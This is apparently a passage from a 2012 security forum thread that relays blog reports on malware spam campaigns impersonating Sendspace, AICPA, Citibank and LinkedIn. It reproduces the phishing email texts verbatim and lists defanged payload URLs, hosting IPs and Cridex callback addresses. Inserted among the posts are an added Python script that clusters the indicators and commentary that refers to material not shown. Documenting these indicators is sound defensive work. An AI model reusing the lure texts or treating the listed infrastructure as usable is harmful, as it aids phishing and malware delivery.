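The CIDR match is what makes Dynamoo's "cut your losses and block the /23" actionable: the last sample line hits a different address in 188.93.210.0/23 than the one named in the post and is still caught, and a bare-IP landing URL is matched on the host as well as on the proxy's destination field.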
AplusWebMaster
2012-12-10, 18:23
FYI...
Fake Sendspace SPAM "You have been sent a file" / anifkailood .ru:
- http://blog.dynamoo.com/2012/12/you-have-been-sent-file-sendspace-spam.html
10 Dec 2012 - "This fake Sendspace spam leads to malware on anifkailood .ru:
Date: Mon, 10 Dec 2012 06:01:01 -0500
From: "Octavio BOWMAN" [AdlaiBaldacci @telefonica .net]
Subject: You have been sent a file (Filename: [redacted]-722.pdf)
Sendspace File Delivery Notification:
You've got a file called [redacted]-018.pdf, (767.2 KB) waiting to be downloaded at sendspace.(It was sent by Octavio BOWMAN).
You can use the following link to retrieve your file:
Download Link
The file may be available for a limited time only.
Thank you,
sendspace - The best free file sharing service.
Please do not reply to this email. This auto-mailbox is not monitored and you will not receive a response.
The malicious payload is at [donotclick]anifkailood .ru:8080/forum/links/column.php hosted on the following IPs:
202.180.221.186 (GNet, Mongolia)
212.162.52.180 (Secure Netz, Germany)
212.162.56.210 (Secure Netz, Germany)..."
___
Fake AICPA SPAM / eaglepointecondo .co
- http://blog.dynamoo.com/2012/12/aicpa-spam-eaglepointecondoco.html
10 Dec 2012 - "This fake AICPA spam leads to malware on eaglepointecondo .co:
Date: Mon, 10 Dec 2012 19:29:21 +0400
From: "AICPA" [alerts@aicpa.org]
Subject: Income fake tax return accusations.
You're receiving this email as a Certified Public Accountant and a member of AICPA.
Having difficulties reading this email? Take a look at it in your browser.
Termination of Public Account Status due to income tax fraud allegations
Respected accountant officer,
We have received a denouncement about your probable interest in income tax return swindle for one of your customers. In concordance with AICPA Bylaw Head # 500 your Certified Public Accountant status can be revoked in case of the occurrence of submitting of a faked or fraudulent income tax return for your client or employer.
Please be notified below and provide explanation of this issue to it within 21 business days. The rejection to provide elucidation within this period would finish in end off of your CPA license.
SubmittedReport.doc
The American Institute of Certified Public Accountants.
Email: service @aicpa .org
Tel. 888.777.7077
Fax. 800.362.5066
The malicious payload is at [donotclick]eaglepointecondo .co/detects/denouncement-reports.php hosted on 59.57.247.185 in China, which has been used a few times recently* for malware distribution..."
* http://blog.dynamoo.com/search?q=59.57.247.185
> http://www.aicpa.org/news/featurednews/pages/alert-fraudulent-email.aspx
Your CPA License has -not- been revoked
- https://isc.sans.edu/diary.html?storyid=14674
Last Updated: 2012-12-10 - "I have been seeing some e-mails hitting my spam traps today, warning me of my revoked CPA license. No, I am not a CPA. But the e-mails are reasonably well done, so I do think some CPAs may fall for them. At least they got the graphics nice and pretty, but the text could be better worded.
> https://isc.sans.edu/diaryimages/images/CPAEmail.png
The only clickable link is the "Delation.pdf" (maybe that should be deletion?). Upon clicking the link, we are sent on the usual malware redirect loop:
The first stop is httx ://tesorogroup .com/components/com_ag_google_analytics2/taxfraudalert.html
It includes javascript and meta tag redirects to
httx ://eaglepointecondo. co/ detects /denouncement-reports.php
... which will test our browser for vulnerable plugins and try to run a java applet. Looks all very "standard". You may want to check your DNS server logs for anybody resolving tesorogroup.com or eaglepointecondo.co . The two hosts currently resolve to 64.15.152.49 and 59.57.247.185 respectively.
Wepawet does a nice job analysing the obfuscated javascript:
http://wepawet.iseclab.org/view.php?hash=c390cd570069882395e24b7a30abbe64&t=1355160668&type=js ..."
___
Facebook SCAM goes wild - doubles over the weekend ...
- http://community.websense.com/blogs/securitylabs/archive/2012/12/10/jackfrost-facebook-scam-going-wild-and-doubles-over-the-weekend.aspx
10 Dec 2012 - "Last week we wrote a blog* about a specific Facebook scam that appeared to spread rather aggressively... Websense... detected that the scam has increased and multiplied over the weekend - particularly on Saturday, where we saw the number of unique URLs related to this scam double. This shows how cyber crooks time their attacks for periods when users are more laid back and when the security community is less likely to alert users to this type of threat... The scam spreads using click-jacking techniques and employs a mass number of varied scam hosts by using the infrastructure of the legitimate service at freedns.afraid .org... A graph showing the volume of unique scam URLs vs. active URLs (available URLs) over the past few days:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/0028.Facebook_5F00_xmas_5F00_23.jpg
Screenshot of the scam's main page:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/7573.Facebook_5F00_xmas_5F00_24.jpg
What the scam looks like in Facebook's news feed. The scam uses various sexually suggestive images and enticing wording to lure users into clicking:
> http://community.websense.com/cfs-filesystemfile.ashx/__key/CommunityServer.Blogs.Components.WeblogFiles/securitylabs/8780.Facebook_5F00_xmas_5F00_25.jpg
* http://community.websense.com/blogs/securitylabs/archive/2012/12/06/merry-xmas-on-facebook.aspx
Facebook Spam leverages/abuses Instagram App
- http://blog.trendmicro.com/trendlabs-security-intelligence/facebook-spam-leverages-abuses-instagram-app/
Dec 10, 2012 - "... social networking sites have often been used to proliferate malware. Just recently, we spotted a Facebook clickjacking attack that leverages and abuses Instagram to point users to malicious websites. Users encounter this threat by being tagged in a photo posted by one of their contacts on Facebook. The post states that users can know who visited their profile on Facebook and how often. It also includes a photo posted via Instagram. We noticed that the photo and the names used in the “Recent Profile Views” (see below) are used repeatedly for other attacks.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2012/12/facebook_post_screenshot.gif
Should users decide to click the link, they are led to a page with instructions on how to generate the verification code. Once done, a pop-up window appears, which is actually the Instagram for Facebook app asking users to click the “Go to App” button. Once done, it -redirects- users to a page that looks like the Facebook Home page.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2012/12/redirection_page_facebook.gif
... the address bar is different from the legitimate Facebook homepage. Users are then asked to copy and paste the malicious URL (which varies per user) into a certain dialog box and to click ‘continue’... the link has so far gathered 825,545 clicks worldwide, mostly coming from the Philippines and India. The said link is attributed to the account maygup88, who is also responsible for 130 other blocked domains. This type of threat on Facebook has taken on different forms these past months, usually under the veil of popular brands such as Diablo 3 and iPad. It has even expanded to other social networking sites like Pinterest and Tumblr, which only means one thing: users are still falling for these scams. With this in mind, users are advised to take precautionary steps such as double-checking the legitimacy of links and posts. And remember: just because a contact posted that link, it does not mean it’s safe..."
___
AICPA SPAM / eaglepointecondo .org
- http://blog.dynamoo.com/2012/12/aicpa-spam.html
10 Dec 2012 - "Yet another fake AICPA spam run today with a slightly different domain from before, now on eaglepointecondo .org:
Date: Mon, 10 Dec 2012 18:51:38 +0100
From: "AICPA" [info @aicpa .org]
Subject: Tax return assistance fraud.
You're receiving this message as a Certified Public Accountant and a part of AICPA.
Having any issues reading this email? Overview it in your favorite browser.
Suspension of CPA license due to income tax indictment
Valued AICPA participant,
We have been notified of your potential participation in income tax refund shady transactions for one of your customers. In concordance with AICPA Bylaw Head # 740 your Certified Public Accountant status can be terminated in case of the act of submitting of a phony or fraudulent tax return for your client or employer.
Please be informed of the complaint below and respond to it within 7 work days. The refusal to respond within this period will finish in cancellation of your Accountant status.
Delation.pdf
The American Institute of Certified Public Accountants.
Email: service @aicpa .org
Tel. 888.777.7077
Fax. 800.362.5066
===================
Date: Mon, 10 Dec 2012 14:50:40 -0300
From: "AICPA" [noreply @aicpa .org]
Subject: Your accountant license can be end off.
You're receiving this message as a Certified Public Accountant and a part of AICPA.
Having problems reading this email? Review it in your browser.
Suspension of Accountant status due to tax return fraud prosecution
Respected AICPA member,
We have received a complaint about your alleged participation in income tax return fraudulent activity for one of your employees. In accordance with AICPA Bylaw Section No. 500 your Certified Public Accountant license can be terminated in case of the event of presenting of a false or fraudulent tax return for your client or employer.
Please find the complaint below below and provide your feedback to it within 3 work days. The rejection to provide the clarifications within this time-frame would abide in end off of your Certified Accountant Career.
SubmittedReport.pdf
The American Institute of Certified Public Accountants.
Email: service @aicpa .org
Tel. 888.777.7077
Fax. 800.362.5066
In this case the malicious payload is at [donotclick]eaglepointecondo .org/detects/denouncement-reports.php hosted on 59.57.247.185 in China, as with the earlier spam run today*."
* http://blog.dynamoo.com/2012/12/aicpa-spam-eaglepointecondoco.html
___
GFI Labs Email Roundup for the Week
- http://www.gfi.com/blog/gfi-labs-email-roundup-for-the-week-5/
Dec 10, 2012 - "... noteworthy email threats for the week of December 3 to 7:
- Phishers Target Wells Fargo Clients
- Message from the Department of Investigations
- Amazon eBook Spam in the Wild
- Spam from AICPA ...
(More detail and screenshots at the gfi URL above.)
AplusWebMaster
2012-12-11, 19:40
FYI...
Fake Changelog SPAM / aseniakrol .ru
- http://blog.dynamoo.com/2012/12/changelog-spam-aseniakrolru.html
11 Dec 2012 - "This spam leads to malware on aseniakrol .ru:
Date: Tue, 11 Dec 2012 10:46:43 -0300
From: Tarra Comer via LinkedIn [member @linkedin .com]
Subject: Re: Your Changelog UPDATED
Hi,
as promised your changelog - View
I. Easley
The malicious payload is at [donotclick]aseniakrol .ru:8080/forum/links/column.php hosted on a bunch of IPs that have been used for malware before:
202.180.221.186 (GNet, Mongolia)
212.162.52.180 (Secure Netz, Germany)
212.162.56.210 (Secure Netz, Germany)..."
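Across the Webroot (7 Dec) and Dynamoo (7, 10 and 11 Dec) posts above, the same hosting IPs and name servers keep reappearing under new domains: 59.57.247.185 behind ibertomoralles.org and both eaglepointecondo domains, 202.180.221.186 behind pelamutrika.ru, anifkailood.ru and aseniakrol.ru, and one set of four name servers behind bamanaco.ru and lentuiax.ru. The script below is an added example (not code from any of those blogs) that makes that pivot explicit: it groups domains into clusters whenever they share an IP or a name server, using a plain union-find. The IOC table is transcribed from the posts and from the ISC diary's tesorogroup.com entry; name servers are only recorded where a post listed them.

```python
"""Pivot on shared infrastructure across the spam runs reported above.
Domains that resolve to the same IP or use the same name servers are
grouped into one cluster, which is the reasoning behind "the same IP used
in several recent attacks".  Added example, not code from those blogs; the
IOC table is transcribed from the posts, the clustering is union-find."""
from collections import defaultdict

# domain -> (hosting IPs, name-server IPs).  Name servers were only given
# for the two Webroot domains; tesorogroup.com comes from the ISC diary.
IOCS = {
    "bamanaco.ru":          ({"82.165.193.26", "203.80.16.81", "216.24.196.66"},
                             {"62.76.178.233", "41.168.5.140", "132.248.49.112", "209.51.221.247"}),
    "lentuiax.ru":          ({"203.80.16.81"},
                             {"62.76.178.233", "41.168.5.140", "132.248.49.112", "209.51.221.247"}),
    "pelamutrika.ru":       ({"202.180.221.186", "208.87.243.131"}, set()),
    "anifkailood.ru":       ({"202.180.221.186", "212.162.52.180", "212.162.56.210"}, set()),
    "aseniakrol.ru":        ({"202.180.221.186", "212.162.52.180", "212.162.56.210"}, set()),
    "ibertomoralles.org":   ({"59.57.247.185"}, set()),
    "eaglepointecondo.co":  ({"59.57.247.185"}, set()),
    "eaglepointecondo.org": ({"59.57.247.185"}, set()),
    "nikolamireasa.com":    ({"188.93.210.133"}, set()),
    "tesorogroup.com":      ({"64.15.152.49"}, set()),   # compromised redirector, not kit hosting
}


def indicator_index(iocs):
    """Map every indicator ("ip:x" / "ns:y") to the set of domains sharing it."""
    index = defaultdict(set)
    for domain, (ips, name_servers) in iocs.items():
        for ip in ips:
            index["ip:" + ip].add(domain)
        for ns in name_servers:
            index["ns:" + ns].add(domain)
    return index


def cluster(iocs):
    """Union-find over domains; two domains are joined by any shared indicator.
    Returns a sorted list of sorted domain tuples, one per cluster."""
    parent = {d: d for d in iocs}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]   # path halving keeps trees shallow
            x = parent[x]
        return x

    for domains in indicator_index(iocs).values():
        first, *rest = sorted(domains)
        for d in rest:
            parent[find(d)] = find(first)

    groups = defaultdict(set)
    for d in iocs:
        groups[find(d)].add(d)
    return sorted(tuple(sorted(g)) for g in groups.values())


def shared_by(indicator, iocs=IOCS):
    """Domains seen on one indicator, e.g. shared_by('ip:59.57.247.185')."""
    return sorted(indicator_index(iocs).get(indicator, ()))


if __name__ == "__main__":
    for group in cluster(IOCS):
        print(len(group), ", ".join(group))
```

With the table as given, the ten domains collapse into five clusters: the two Webroot `.ru` domains, the three `:8080/forum/links/column.php` `.ru` domains, the three `/detects/` domains on 59.57.247.185, and two singletons. A name-server pivot is the more durable one: when the operators move to a fresh IP, the `ns:` keys still join the new domain to the old cluster, which is why the posts list both.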
AplusWebMaster
2012-12-12, 14:41
FYI...
Fake Sendspace emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/12/12/malicious-sendspace-file-delivery-notifications-lead-to-black-hole-exploit-kit/
Dec 12, 2012 - "Cybercriminals are currently attempting to trick hundreds of thousands of users into clicking on the malicious links found in the currently spamvertised -bogus- ‘Sendspace File Delivery Notifications‘. Upon clicking on any of the links found in the email, users are exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/12/email_spam_exploits_malware_social_engineering_black_hole_exploit_kit.png
... Sample client-side exploits served: CVE-2010-0188
Upon successful client-side exploitation, the campaign drops MD5: 532bdd2565cae7b84cb26e4cf02f42a0 * ... Worm:Win32/Cridex.E
Once executed it creates %AppData%\kb00121600.exe on the affected system.
The sample also creates the following registry entries:
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CFBDC89D4
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\S25BC2D7B
As well as the following Mutexes:
Local\XMM00000418
Local\XMI00000418
Local\XMRFB119394
Local\XMM000005E4
Local\XMI000005E4
Local\XMM0000009C
Local\XMI0000009C
Local\XMM000000C8
Local\XMI000000C8
It then phones back to hxxp ://210.253.102.95 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/ and to hxxp ://123.49.61.59 :8080/AJtw/UCyqrDAA/Ud+asDAA/ ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/a0703de85f59b501935eff571a6c6b6f9e30c03c703a678abe699019e2c1eb2b/analysis/
File name: contacts.exe.x-msdownload
Detection ratio: 33/44
Analysis date: 2012-11-13
___
Fake Citibank SPAM / platinumbristol .net
- http://blog.dynamoo.com/2012/12/citibank-spam-platinumbristolnet.html
12 Dec 2012 - "This fake Citibank spam leads to malware on platinumbristol .net:
From: citibankonline @serviceemail1 .citibank .com via pado .com .br
Date: 12 December 2012 15:38
Subject: Account Alert
Mailed-by: pado .com .br
Citi
Email Security Zone EMAIL SECURITY AREA
ATM/Credit card ending in: XXX7
Alerting System
Bill Payment
Ultimate Savings Account (USA) XXXXXXXXX2
Amount Debited: $2,973.22
Date: 12/12/12
Log In to Overview Transaction
Bill Payment
Ultimate Savings Account (USA) XXXXXXXXX2
Amount Credited: $.97
Date: 12/12/12
Visit this link to Overview Detailed information
ABOUT THIS MESSAGE
Please DO NOT reply to this message. auomatic informational system unable to accept incoming messages.
Citibank, N.A. Member FDIC.
© 2012 Citigroup Inc. Citi with Arc Design and Citibank are registered service marks of Citigroup Inc.
========================
From: citibankonline @serviceemail5 .citibank .com via clickz .com
Date: 12 December 2012 15:39
Subject: Account Notify
Mailed-by: clickz .com
Citi
Email Security Zone EMAIL SAFETY AREA
ATM/Debit card ending in: XXX7
Alerting System
Money Transfer Report
Savings Account XXXXXXXXX8
Amount Withdrawn: $3,620.11
Date: 12/12/12
Visit this link to Cancel Details
Money Transfer Report
Savings Account XXXXXXXXX8
Amount Withdrawn: $.38
Date: 12/12/12
Sign In to Overview Details
ABOUT THIS MESSAGE
Please Not try to reply to this message. automative notification system unable to accept incoming messages.
Citibank, N.A. Member FDIC.
© 2012 Citigroup Inc. Citi with Arc Design and Citibank are registered service marks of Citigroup Inc.
========================
Date: Wed, 12 Dec 2012 23:16:15 +0700
From: alets-no-reply @serviceemail6 .citibank .com
Subject: Account Insufficient funds
EMAIL SAFETY ZONE
ATM/Debit card ending in: XXX0
Notifications System
Transaction Announcement
Ultimate Savings Account (USA) XXXXXXXXX4
Amount Debited: $4,222.19
Date: 12/12/12
Login to Abort Detailed information
Transaction Announcement
Ultimate Savings Account (USA) XXXXXXXXX4
Amount Credited: $.41
Date: 12/12/12
Go to web site by clicking here to See Operation
ABOUT THIS MESSAGE
Please Not try to reply to this message. automative notification system cannot accept incoming mail.
Citibank, N.A. Member FDIC.
2012 Citigroup Inc. Citi with Arc Design and Citibank are registered service marks of Citigroup Inc.
========================
Date: Wed, 12 Dec 2012 20:07:46 +0400
From: citibankonline @serviceemail8 .citibank .com
Subject: Account Operation Alert
EMAIL SECURITY ZONE
Credit card ending in: XXX0
Notifications System
Bill Payment
Ultimate Savings Account (USA) XXXXXXXXX3
Amount Credited: $5,970.51
Date: 12/12/12
Click Here to Review Transaction
Bill Payment
Ultimate Savings Account (USA) XXXXXXXXX3
Amount Withdrawn: $.11
Date: 12/12/12
Sign In to View Operation
ABOUT THIS MESSAGE
Please don't reply to this message. auomatic informational system cannot accept incoming mail.
Citibank, N.A. Member FDIC.
2012 Citigroup Inc. Citi with Arc Design and Citibank are registered service marks of Citigroup Inc.
The malicious payload is at [donotclick]platinumbristol .net/detects/alert-service.php hosted on the same 59.57.247.185 IP address in China that has been used in several recent attacks. This is definitely an IP to block if you can.
I can see the following evil domains on that same server..."
(More detail at the dynamoo URL above.)
:mad:
AplusWebMaster
2012-12-13, 14:30
FYI...
Fake Citi Cards SPAM / 6.bbnface .com and 6.mamaswishes .com
- http://blog.dynamoo.com/2012/12/citi-cards-spam-6bbnfacecom-and.html
13 Dec 2012 - "This fake Citi Cards spam leads to malware on 6.bbnface .com and 6.mamaswishes .com:
Date: Thu, 13 Dec 2012 11:59:33 +0300
From: Citi Cards [citicards @info .citibank .com]
Subject: Your Citi Credit Card Statement
Add citicards @info .citibank .com to your address book to ensure delivery.
Your Account: Important Notification
Your Citi Credit Card statement is ready to view online
Dear customer,
Your Citi Credit Card statement is now available for you to view online. Here are some key pieces of information from your statement:
Statement Date: December 13, 2012
Statement Balance: -$8,803.77
Minimum Payment Due: $750.00
Payment Due Date: Tue, January 01, 2013
Want help remembering your payment due date? Sign up for automated alerts such as Payment Due reminders with Alerting Service.
To set up alerts sign on to www .citicards .com and go to Account Profile.
Iprefer not to have this email contain specific information from my statement. Please send me just the announcement that my statement is ready to view online.
View Your Account Pay Your Bill Contact Us
Privacy | Security
Email Preferences
This message is from Citi Cards. Your credit card is issued by Citibank, N.A. If you'd like to refine the types of email messages you receive, or if you'd prefer to stop receiving email from us, please go to... Citibank manages email preferences by line of business. Changing your email preferences with Citi Cards does not change your email preferences for messages from Citibank's other businesses which include retail branch banking among others.
Should you want to contact us in writing concerning this email, please direct your correspondence to:
Citibank Customer Service
P. O. Box 6500
Sioux Falls, SD 57117
Help / Contact Us
If you have questions about your account, please use our secure message center by signing on at... and choosing "Contact Us" from the "Help / Contact Us" menu. You can also call the customer service phone number on the back of your card.
(c) 2012 Citibank, N.A.
All rights reserved.
Citi, Citibank and Citi with Arc Design are registered service marks of Citigroup Inc.
============================
Date: Thu, 13 Dec 2012 10:30:55 +0200
From: Citi Cards [citicards @info .citibank .com]
Subject: Your Citi Credit Card Statement
Add citicards @info .citibank .com to your address book to ensure delivery.
Your Account: Important Notification
Your Citi Credit Card statement is ready to view online
Dear customer,
Your Citi Credit Card statement is now available for you to view online. Here are some key pieces of information from your statement:
Statement Date: December 13, 2012
Statement Balance: -$5,319.77
Minimum Payment Due: $506.00
Payment Due Date: Tue, January 01, 2013
Want help remembering your payment due date? Sign up for automated alerts such as Payment Due reminders with Alerting Service.
To set up alerts sign on to www .citicards .com and go to Account Profile.
Iprefer not to have this email contain specific information from my statement. Please send me just the announcement that my statement is ready to view online.
View Your Account Pay Your Bill Contact Us
Privacy | Security
Email Preferences
This message is from Citi Cards. Your credit card is issued by Citibank, N.A. If you'd like to refine the types of email messages you receive, or if you'd prefer to stop receiving email from us, please go to... Citibank manages email preferences by line of business. Changing your email preferences with Citi Cards does not change your email preferences for messages from Citibank's other businesses which include retail branch banking among others.
Should you want to contact us in writing concerning this email, please direct your correspondence to:
Citibank Customer Service
P. O. Box 6500
Sioux Falls, SD 57117
Help / Contact Us
If you have questions about your account, please use our secure message center by signing on at... and choosing "Contact Us" from the "Help / Contact Us" menu. You can also call the customer service phone number on the back of your card.
(c) 2012 Citibank, N.A.
All rights reserved.
Citi, Citibank and Citi with Arc Design are registered service marks of Citigroup Inc.
The links in the email bounce through a legitimate hacked site, and in the samples I have seen end up on [donotclick]6.bbnface .com/string/obscure-logs-useful.php or [donotclick]6.mamaswishes .com/string/obscure-logs-useful.php both hosted on 173.246.102.223 (Gandi, US) which probably contains many other evil sites, so blocking that IP address would probably be prudent."
___
More "Copies of Policies" SPAM / awoeionfpop .ru:
- http://blog.dynamoo.com/2012/12/copies-of-policies-spam-awoeionfpopru.html
13 Dec 2012 - "This spam leads to malware on awoeionfpop .ru:
Date: Thu, 13 Dec 2012 09:08:32 -0400
From: "Myspace" [noreply @message .myspace .com]
Subject: Fwd: Deshaun - Copies of Policies
Unfortunately, I cannot obtain electronic copies of the SPII policy.
Here is the Package and Umbrella,
and a copy of the most recent schedule.
Deshaun ZAMORA,
The malicious payload is at [donotclick]awoeionfpop .ru:8080/forum/links/column.php hosted on the following IPs that I haven't seen before:
75.148.242.70 (Comcast Business, US)
91.142.208.144 (Axarnet, Spain)..."
(More detail at the dynamoo URL above.)
___
Fake Citibank SPAM / eaglepointecondo .biz
- http://blog.dynamoo.com/2012/12/citibank-spam-eaglepointecondobiz.html
13 Dec 2012 - "This fake Citibank spam leads to malware on eaglepointecondo .biz:
Date: Thu, 13 Dec 2012 16:59:14 +0400
From: "Citi Alerts" [lubumbashiny63 @bankofdeerfield .com]
Subject: Account Operation Alert
EMAIL SAFETY AREA
ATM/Credit card ending in: XXX8
Notifications System
Wire Transaction Issued
Ultimate Savings Account (USA) XXXXXXXXX5
Amount Withdrawn: $4,564.61
Date: 12/12/12
Sign In to Abort Details
Wire Transaction Issued
Ultimate Savings Account (USA) XXXXXXXXX5
Amount Debited: $.24
Date: 12/12/12
Login to Overview Operation
ABOUT THIS MESSAGE
Please DO NOT reply to this message. auto-notification system can't accept incoming mail.
Citibank, N.A. Member FDIC.
2012 Citigroup Inc. Citi with Arc Design and Citibank are registered service marks of Citigroup Inc.
====================
From: Citibank - Alerts [mailto:enormityyf10 @iztzg .hr]
Sent: 13 December 2012 12:50
Subject: Account Operation Alert
Importance: High
EMAIL SAFETY AREA
ATM/Credit card ending in: XXX6
Notifications System
Bill Payment
Checking XXXXXXXXX7
Amount Withdrawn: $5,951.56
Date: 12/12/12
Visit this link to Cancel Detailed information
Bill Payment
Checking XXXXXXXXX7
Amount Debited: $.14
Date: 12/12/12
Login to Review Operation
ABOUT THIS MESSAGE
Please don't reply to this message. auto informer system unable to accept incoming mail.
Citibank, N.A. Member FDIC.
2012 Citigroup Inc. Citi with Arc Design and Citibank are registered service marks of Citigroup Inc.
====================
From: Citibank - Service [mailto:goaliesj79 @wonderware .com]
Sent: 13 December 2012 12:59
Subject: Account Alert
Importance: High
EMAIL SAFETY ZONE
ATM/Debit card ending in: XXX8
Alerting System
Withdraw Message
Savings Account XXXXXXXXX4
Amount Debited: $1,218.42
Date: 12/12/12
Login to Abort Operation
Withdraw Message
Savings Account XXXXXXXXX4
Amount Withdrawn: $.42
Date: 12/12/12
Sign In to Overview Operation
ABOUT THIS MESSAGE
Please DO NOT reply to this message. auto-notification system not configured to accept incoming mail.
Citibank, N.A. Member FDIC.
2012 Citigroup Inc. Citi with Arc Design and Citibank are registered service marks of Citigroup Inc.
The malicious payload is on [donotclick]eaglepointecondo .biz/detects/operation_alert_login.php hosted on 59.57.247.185 in China, the same IP has been used several times for evil recently and you should block it if you can."
:mad:
AplusWebMaster
2012-12-14, 14:51
FYI...
Dexter malware targets POS systems...
- http://www.theregister.co.uk/2012/12/14/dexter_malware_targets_pos_systems/
14 Dec 2012 - "You could be getting more than you bargained for when you swipe your credit card this holiday shopping season, thanks to new malware that can skim credit card info from compromised point-of-sale (POS) systems. First spotted by security firm Seculert*, the malware dubbed "Dexter" is believed to have infected hundreds of POS systems in 40 countries worldwide in recent months. Companies targeted include retailers, hotel chains, restaurants, and private parking providers. The US, the UK, and Canada top the list of countries where the malicious app has been found... Once the malware is installed on a POS system, it grabs the machine's list of active processes and sends them to a command-and-control server – a highly unusual step for POS malware, according to security researchers at Trustwave**..."
* http://blog.seculert.com/2012/12/dexter-draining-blood-out-of-point-of.html
** http://blog.spiderlabs.com/2012/12/the-dexter-malware-getting-your-hands-dirty.html
___
Something evil on 87.229.26.138
- http://blog.dynamoo.com/2012/12/something-evil-on-8722926138.html
14 Dec 2012 - "This seems to be a bunch of evil domains on 87.229.26.138 (Deninet, Hungary) being used in injection attacks. Possible payloads include Blackhole (for example*).
* http://urlquery.net/report.php?id=406222
There are two sets of domains, .in domains being used by themselves and .eu domains being used with subdomains, listed below.
The registration details are probably fake, but for the record the .eu domains are registered to:
Juha Salonen
Lukiokatu 23
13430 Hameenlinna
Hameenlinna
Finland
salonen_juha @yahoo .com
The .in domains are registered to:
Puk T Lapkanen
Puruntie 33
LAPPEENRANTA
53200
FI
+358.443875638
puklapkanen @yahoo .com
If you can block the IP address then it will be the simplest option as there are rather a lot of domains here..."
(More detail at the dynamoo URL above.)
___
Fake Citibank SPAM / 4.whereintrentinoaltoadige .com
- http://blog.dynamoo.com/2012/12/citibank-spam-4whereintrentinoaltoadige.html
14 Dec 2012 - "This fake Citibank spam leads to malware on 4.whereintrentinoaltoadige .com:
Date: Fri, 14 Dec 2012 13:54:14 +0200
From: Citi Cards [citicards @info .citibank .com]
Subject: Your Citi Credit Card Statement
Add citicards @info .citibank .com to your address book to ensure delivery.
Your Account: Important Notification
Your Citi Credit Card statement is ready to view online
Dear customer,
Your Citi Credit Card statement is now available for you to view online. Here are some key pieces of information from your statement:
Statement Date: December 13, 2012
Statement Balance: -$4,550.67
Minimum Payment Due: $764.00
Payment Due Date: Tue, January 01, 2013
Want help remembering your payment due date? Sign up for automated alerts such as Payment Due reminders with Alerting Service.
To set up alerts sign on to... and go to Account Profile.
Iprefer not to have this email contain specific information from my statement. Please send me just the announcement that my statement is ready to view online.
View Your Account Pay Your Bill Contact Us
Privacy | Security
Email Preferences
This message is from Citi Cards. Your credit card is issued by Citibank, N.A. If you'd like to refine the types of email messages you receive, or if you'd prefer to stop receiving email from us, please go to... Citibank manages email preferences by line of business. Changing your email preferences with Citi Cards does not change your email preferences for messages from Citibank's other businesses which include retail branch banking among others.
Should you want to contact us in writing concerning this email, please direct your correspondence to:
Citibank Customer Service
P. O. Box 6500
Sioux Falls, SD 57117
Help / Contact Us
If you have questions about your account, please use our secure message center by signing on at... and choosing "Contact Us" from the "Help / Contact Us" menu. You can also call the customer service phone number on the back of your card.
(c) 2012 Citibank, N.A.
All rights reserved.
Citi, Citibank and Citi with Arc Design are registered service marks of Citigroup Inc.
====================
Alternative mid-sections:
Statement Date: December 13, 2012
Statement Balance: -$8,902.58
Minimum Payment Due: $211.00
Payment Due Date: Tue, January 01, 2013
Statement Date: December 13, 2012
Statement Balance: -$9,905.95
Minimum Payment Due: $535.00
Payment Due Date: Tue, January 01, 2013
The malicious payload is at [donotclick]4.whereintrentinoaltoadige .com/string/obscure-logs-useful.php hosted on 198.74.54.28 (Linode, US)... malicious domains are also on the same server..."
(More detail at the dynamoo URL above.)
___
More Citibank SPAM / 6.bbnsmsgateway .com
- http://blog.dynamoo.com/2012/12/citibank-spam-6bbnsmsgatewaycom.html
14 Dec 2012 - "This fake Citibank spam leads to malware on 6.bbnsmsgateway .com:
Date: Fri, 14 Dec 2012 19:27:56 +0530
From: Citi Cards [citicards @info.citibank .com]
Subject: Your Citi Credit Card Statement
Add citicards @info.citibank .com to your address book to ensure delivery.
Your Account: Important Notification
Your Citi Credit Card statement is ready to view online
Dear customer,
Your Citi Credit Card statement is now available for you to view online. Here are some key pieces of information from your statement:
Statement Date: December 13, 2012
Statement Balance: -$4,873.54
Minimum Payment Due: $578.00
Payment Due Date: Tue, January 01, 2013
Want help remembering your payment due date? Sign up for automated alerts such as Payment Due reminders with Alerting Service.
To set up alerts sign on to www.citicards.com and go to Account Profile.
Iprefer not to have this email contain specific information from my statement. Please send me just the announcement that my statement is ready to view online.
View Your Account Pay Your Bill Contact Us
Privacy | Security
Email Preferences
This message is from Citi Cards. Your credit card is issued by Citibank, N.A. If you'd like to refine the types of email messages you receive, or if you'd prefer to stop receiving email from us, please go to: http://www.email.citicards.com. Citibank manages email preferences by line of business. Changing your email preferences with Citi Cards does not change your email preferences for messages from Citibank's other businesses which include retail branch banking among others.
Should you want to contact us in writing concerning this email, please direct your correspondence to:
Citibank Customer Service
P. O. Box 6500
Sioux Falls, SD 57117
Help / Contact Us
If you have questions about your account, please use our secure message center by signing on at... and choosing "Contact Us" from the "Help / Contact Us" menu. You can also call the customer service phone number on the back of your card.
(c) 2012 Citibank, N.A.
All rights reserved.
Citi, Citibank and Citi with Arc Design are registered service marks of Citigroup Inc.
The malicious payload is at [donotclick]6.bbnsmsgateway .com/string/obscure-logs-useful.php hosted on 192.155.81.9 (Linode, US). There are probably some other bad domains on this server, so blocking access to that IP could be prudent."
___
Changelog SPAM / aviaonlolsio .ru
- http://blog.dynamoo.com/2012/12/changelog-spam-aviaonlolsioru.html
14 Dec 2012 - "This fake Changelog spam leads to malware on aviaonlolsio .ru:
From: messages-noreply @bounce .linkedin .com [mailto :messages-noreply @bounce .linkedin .com] On Behalf Of Earlean Gardner via LinkedIn
Sent: 13 December 2012 20:22
Subject: Re: Changelog as promised (upd.)
Hi,
as promised - View
I. SWEET
====================
Date: Fri, 14 Dec 2012 05:22:54 +0700
From: "Kaiya HIGGINS" [fwGpEzHIGGINS @hotmail .com]
Subject: Re: Fwd: Changelog as promised(updated)
Hi,
as promised chnglog updated - View
I. HIGGINS
